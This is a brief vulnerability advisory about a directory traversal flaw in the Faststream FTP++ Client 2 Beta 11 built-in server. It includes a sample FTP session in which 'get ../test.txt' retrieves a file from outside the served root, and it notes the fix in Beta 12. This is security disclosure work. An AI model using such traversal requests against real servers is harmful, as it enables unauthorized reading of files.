COMMAND

    Faststream FTP++

SYSTEMS AFFECTED

    Faststream FTP++ Client 2 Beta 11 (build in server)

PROBLEM

    'se00020'  found  following.    Faststram  FTP  built  in   server
    responds with  the real  path of  directory instead  of a  virtual
    one.   It  is  possible  to  get  files outside of root directory.
    Note that this is similar to:

        http://oliver.efri.hr/~crv/security/bugs/Others/fastream.html

    e:\crap was used as root directory

        230 User anonymous logged in.
        ftp> pwd
        257 "/E:/crap/" is current directory.
        
        ftp> dir
        200 Port command successful.
        150 Opening data connection for directory list.
        drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
        drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
        drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
        -rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
        -rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 bisontest.txt
        drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
        drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
        226 File sent ok
        FTP: 438 Bytes empfangen in 0,00Sekunden
        438000,00KB/s
        ftp> get ../test.txt
        200 Port command successful.
        150 Opening data connection for ../test.txt.
        226 File sent ok
        FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

SOLUTION

    Vendor have  just fixed  it.   The fixed  Beta 12  is fixing this.
    This was fixed  in an earlier  beta (tested it),  however it seems
    the fix wasn't incorporated in the latest version.